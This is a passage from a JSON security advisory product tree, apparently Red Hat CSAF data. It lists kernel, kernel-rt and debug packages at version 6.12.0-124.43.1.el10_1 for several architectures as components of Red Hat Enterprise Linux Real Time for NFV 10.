"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
